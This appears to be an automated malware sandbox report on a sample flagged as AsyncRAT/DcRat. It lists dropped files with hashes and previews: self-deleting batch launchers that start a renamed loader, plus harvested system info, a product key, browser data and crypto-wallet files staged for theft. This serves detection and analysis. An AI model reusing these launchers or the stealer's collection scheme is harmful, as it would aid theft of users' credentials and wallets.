SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA77.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpAA25.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpAB7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	modified
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpABDC.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\Infected.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	153
Entropy (8bit):	5.026197843416534
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5oUkh4EaKC5NoAXLsmqRDUkh4E2J5xAInTRIJbRwZPy:hWKqTtT69aZ5HLsmq1923fTERwk
MD5:	66C56EC8C80ED1F5484BA45B861BB7F0
SHA1:	355E2791C039EE2F347B4AC13820D52E525B9EAB
SHA-256:	928C93BCBC2DF062541B03FB48BA9C039C27F323893713E311D198D63D7E1EF5
SHA-512:	3CC40720EFB067BCB45E229DB3795A4905D43A202ACCD0B019511ED2F8399B13F23755D942A2CB8A9813BBC2ECE53F01037EE777F5A2C1395E12EDD275F65586
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Loaader.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF85A.tmp.bat" /f /q..

C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\Client.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.055213759922053
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5oUkh4EaKC5N/ZmqRDUkh4E2J5xAInTRIJFiVZPy:hWKqTtT69aZ5BZmq1923fTqiVk
MD5:	13DD23CEB577D0E355382A4C3669E993
SHA1:	D5AB5C9CAD750573B7D65175087E496BDABBC046
SHA-256:	D8B6BB1E9D154A17D5107B0151AE7005946CDBA5EA216F3D7EE005DB116C141B
SHA-512:	4190C2A32D1F89A9B9A0FBB38FA0B2F5A2EE3918024FEE0CCB1967CB71355A8DEC0AE857BCA409D5A2201A111D2FA1BDDAD3DD2AE43456AEEB7F7DE45AF724B2
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Loader.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF879.tmp.bat" /f /q..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\DotNetZip-zvrymdq1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	99706
Entropy (8bit):	7.977167598832253
Encrypted:	false
SSDEEP:	3072:yMoc3+BW5WJA0S5WGm5ELTrFcyj0063bVnOS:2Y+BW5WJA0S5I8XJ0bZl
MD5:	746030818E79376B6E81F24D810A17DE
SHA1:	875BBFCCF980139AD7495AEAF9684084EB67910B
SHA-256:	38A0C2D270E76C9025EEC1CBA7A5599C1E9F26AF84179BA960796B960C0A7E8E
SHA-512:	2F1DC7CEEACCC317A324CD109A4C00D8F54F65BB901DAA64D54D2E009AA815B0A20D2BB9336582FFDA74B4D00386E537DC3A02B147AF7400F0ECCF7FD193484B
Malicious:	false
Preview:	PK........\L.X..............$.Browsers/.. .......................,,......PK........\L.X..............$.Browsers/Google/.. .........,,......,,......,,......PK........\L.X..............$.Browsers/Mozilla/.. ..............................PK........]L.X..............$.Browsers/Mozilla/Firefox/.. .........9.e.....9.e............PK........]L.XQ3..J...i...&.$.Browsers/Mozilla/Firefox/Bookmarks.txt.. .........9.e.....9.e......&a.....SVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........]L.Xc.e.S...^...$.$.Browsers/Mozilla/Firefox/History.txt.. .........9.e.....9.e.....9.e.....SVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK........]L.X..............$.Directories/.. .........v.......v........%......PK........]L.X.Ir...........$.Directories/OneDrive.txt.. .........v.......v.......v.......OneDrive\...desktop.ini..PK........]L.X. .4..........$.Directories/Startup.txt.. .........v.......v.......v.......Startup\...desktop.ini..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH.zip (copy)

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	99706
Entropy (8bit):	7.977167598832253
Encrypted:	false
SSDEEP:	3072:yMoc3+BW5WJA0S5WGm5ELTrFcyj0063bVnOS:2Y+BW5WJA0S5I8XJ0bZl
MD5:	746030818E79376B6E81F24D810A17DE
SHA1:	875BBFCCF980139AD7495AEAF9684084EB67910B
SHA-256:	38A0C2D270E76C9025EEC1CBA7A5599C1E9F26AF84179BA960796B960C0A7E8E
SHA-512:	2F1DC7CEEACCC317A324CD109A4C00D8F54F65BB901DAA64D54D2E009AA815B0A20D2BB9336582FFDA74B4D00386E537DC3A02B147AF7400F0ECCF7FD193484B
Malicious:	false
Preview:	PK........\L.X..............$.Browsers/.. .......................,,......PK........\L.X..............$.Browsers/Google/.. .........,,......,,......,,......PK........\L.X..............$.Browsers/Mozilla/.. ..............................PK........]L.X..............$.Browsers/Mozilla/Firefox/.. .........9.e.....9.e............PK........]L.XQ3..J...i...&.$.Browsers/Mozilla/Firefox/Bookmarks.txt.. .........9.e.....9.e......&a.....SVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........]L.Xc.e.S...^...$.$.Browsers/Mozilla/Firefox/History.txt.. .........9.e.....9.e.....9.e.....SVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK........]L.X..............$.Directories/.. .........v.......v........%......PK........]L.X.Ir...........$.Directories/OneDrive.txt.. .........v.......v.......v.......OneDrive\...desktop.ini..PK........]L.X. .4..........$.Directories/Startup.txt.. .........v.......v.......v.......Startup\...desktop.ini..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Browsers\Mozilla\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Browsers\Mozilla\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Desktop.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	97598
Entropy (8bit):	7.878941031077751
Encrypted:	false
SSDEEP:	1536:CYVnR7H5reo94T0/2JPolRCFdAwZwu4lAJXka5inqYH0lCwR5/M3EOg3JADDDVnG:/H5qo9O62r1hws5kvH0v5/M34JADDDVG
MD5:	906640AEE55936F89DB35CB77EC28733
SHA1:	62533CEB7E44F62692E101D0DF697038A0D6FAA4
SHA-256:	6A9FF87505395ECBD93E6CF1421A82698B682BE68756ADA1F4F766991DE92A7B
SHA-512:	86B3790A6927D2392453B8270287665D71C08B9859CBDF01BD7E71FDCF007193F62C669EC1970A3F6C0FBD69FE7F00EE536165ADC6E95D26CDF29E5949342B86
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Info.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	485
Entropy (8bit):	5.420088514743829
Encrypted:	false
SSDEEP:	12:RFNewPRbVkb2X2YFbskPhzJxWW/vdUXyl:3EwP/kbqRFAkPZJxWW6I
MD5:	961F202A8DEBB80B5E7E05EA452DB203
SHA1:	1A146821B84A7C7EB2EE776F144FAD5BA0743B45
SHA-256:	45FC3765E419E466DC8EA05A71AF360B72923BD04537F0ADCF7D372B3DB9BCC1
SHA-512:	81C5A8FF246FF40D8C28690717C28959A15BA6BF0E2FE41577A400EA0FCA2CB8137CD973049A3D2B03EB4C4E06464973B1E848C72CFFE507F78AB02F2E7B27A0
Malicious:	false
Preview:	.[IP].External IP: 8.46.123.175.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 965969.System: Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: GR4XPRK4V.RAM: 4095MB.DATE: 2024-05-23 9:35:27 am.SCREEN: 1280x1024.WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Debugger: False.Processe: False.Hosting: False.Antivirus: Windows Defender..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	21092
Entropy (8bit):	5.625459767121628
Encrypted:	false
SSDEEP:	96:THoP6HwNWYws223e3T5aCFP2PSQIz/CqCURWBSduaf1jNX9DZQg9:THoPhO9aCZ2aQIz/LCUR6Sduaf1RX97
MD5:	93AC0064E5D10DB8F1EF22327FBED7E7
SHA1:	CD6C78AA5F426B01A7626B67E25212A6F2174C91
SHA-256:	78B77067E1FC4BABAB4D21D551C4D7FC7F99CC35D97F6C3F5D86F279FF150652
SHA-512:	4641F0373E25B8B9FE5469D1EFE7B113F7C46A0C8AD2D6DB2DFF2AFB515D82C19114B43C666BF8CFB632B32256A6B666A1CF68E2D5642EF591882CDF9D1430F9
Malicious:	false
Preview:	NAME: GCWhrDvYvXGWbQGIbWK ..PID: 6464 ..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: GCWhrDvYvXGWbQGIbWK ..PID: 4308 ..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: svchost ..PID: 2152 ..EXE: C:\Windows\system32\svchost.exe..NAME: GCWhrDvYvXGWbQGIbWK ..PID: 3012 ..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: RuntimeBroker ..PID: 4732 ..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: csrss ..PID: 420 ..EXE: ..NAME: svchost ..PID: 3512 ..EXE: ..NAME: GCWhrDvYvXGWbQGIbWK ..PID: 2136 ..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: svchost ..PID: 5152 ..EXE: C:\Windows\system32\svchost.exe..NAME: svchost ..PID: 1272 ..EXE: C:\Windows\system32\svchost.exe..NAME: WinDefend ..PID: 2132 ..EXE

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.237291339955158
Encrypted:	false
SSDEEP:	3:jygCkJfv:Q8H
MD5:	E62D6B5E8737B2880337BD3568B3230C
SHA1:	564C9791260A7C120DFAA89CF1D5E858B9DBD661
SHA-256:	9A1DBF2FF1AD76BBF36DE0DF7B6B23DCD098F648FCE94ABB65B8B95A32118FC6
SHA-512:	33878106546EFF57F757645F7656106F0BA0E97E0DD1F4EA5ABE83C12DD006FBF9EA48BC48A7B4A2757FFAFF5E7C94B140477A042B4EC9C32315CD9586627DA5
Malicious:	false
Preview:	97W83-NHMRY-3JT7X-F4DC6-TK6BJ

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	5.612450421355055
Encrypted:	false
SSDEEP:	48:/LwUrBHEZJzelwRBWbe5OFMSyJvpfw9sK57qXrHnJ7X2HetcZKFMJ8YrjZSsFy2T:/Bf7Q2FKqVzdN+Jip
MD5:	0EDFA710467E8FD7EE7FEC6451B0EBA7
SHA1:	1F5C39A7A5B0E2E3B3290C0ED5EC243F0AD32ACE
SHA-256:	63F868D4F08EF3A4626D1D66B3F1B554C0F101714492128B3A9812F194A9F5BB
SHA-512:	DDEAE647DE922549A18E92DD43BC5849A9BC7E406E2841F54A3DA6DFA4EBCACFD9227CD1E489067F1973415243B7B78CC4D7E2C21D1F743F0F425FDEC96BA30F
Malicious:	false
Preview:	NAME: GCWhrDvYvXGWbQGIbWK..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: GCWhrDvYvXGWbQGIbWK..TITLE: New Tab - Google Chrome..PID: 4308..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: GCWhrDvYvXGWbQGIbWK..TITLE: New Tab - Google Chrome..PID: 3012..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: GCWhrDvYvXGWbQGIbWK..TITLE: New Tab - Google Chrome..PID: 2136..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: GCWhrDvYvXGWbQGIbWK..TITLE: New Tab - Google Chrome..PID: 2128..EXE: C:\Program Files (x86)\vcuryeGmghZnkWeStsyRRoNuTgjFvtdPmlZvwuasKAUUvKUCbHiYsvMekQMHyw\GCWhrDvYvXGWbQGIbWK.exe..NAME: GCWhrDvYvXGWbQGIbWK..TITLE: New Tab - Google Chrome..PID: 6648..

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	367
Entropy (8bit):	5.215993814069912
Encrypted:	false
SSDEEP:	6:kk8aM1923oH+Tcwt8age8Y55HEZzXELIx2KLlp8hMq2P923oH+Tcwt8age8Y55H0:kk8ahYeb8rcHEZrEkVLT8uv4Yeb8rcH0
MD5:	6B9F5B8743F68BCE7EC2C3C5550E37E2
SHA1:	DFB609C9CBFCA8CCA3EF409DE9E1BE1699AE5C51
SHA-256:	422C5727958B56FCAF5F4097F10EF8DE06A46952261EBEDBB96C1AACADD8D693
SHA-512:	E74077F9627DF163DC70F141A9FDE145292F048456F182F5F19CAB49DED7C3EE8D53923B7BCB2200F17E531EEDE0209984B3681E6BFDF2F5B4DD66695A87CF6F
Malicious:	false
Preview:	2023/10/04-14:34:43.146 1894 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2023/10/04-14:34:43.148 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Roaming\Loaader.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Infected.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	5.808021958358459
Encrypted:	false
SSDEEP:	768:CuY6LVcsTPq781wC8A+XjuazcBRL5JTk1+T4KSBGHmDbD/ph0oX9rAW6dEYSuEdP:reQPckdSJYUbdh9O8uEdpqKmY7
MD5:	B8D455465260A845DB35492FDA5A8888
SHA1:	287B0BA049AD8F3BE802D2224EFB86DBA72D3221
SHA-256:	A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
SHA-512:	5DBA43AE31420DE362593752E8FF491AFBE8D20F183F6B95E6962EA1E637C7BF3BD50B5213E4D928A96B85D9B54841EE697798B0089624B13EF7EDED826CD86A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Loaader.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Loaader.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Roaming\Loaader.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:	Filename: t3h7DNer1Q.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.eb................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........f..............................................................W......H3.......W......3........./.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(C......2~.....oD....s....%r...po....(h...ru..p(....o....o....o....( ... ....(.....s....%r...po....r...po....%r...po.....o....o....( ...Vs.........si.........~"......"...F.(+...~!...o....*&...o.

C:\Users\user\AppData\Roaming\Loader.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Client.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	5.79595234679389
Encrypted:	false
SSDEEP:	1536:WUxQcxHCapCtGPMVCe9VdQuDI6H1bf/yBZUu7QzciLVclN:WUOcxHCoeGPMVCe9VdQsH1bfqvUwQzBY
MD5:	7AC0ADF482250172280DEFEC7A7054DA
SHA1:	20A25F0DA68C309D062C4628EAD8B6F377AC7969
SHA-256:	3CAA5F06008365FBECF46198744793C36C42309B49A6324BEBE8123BE10F87D5
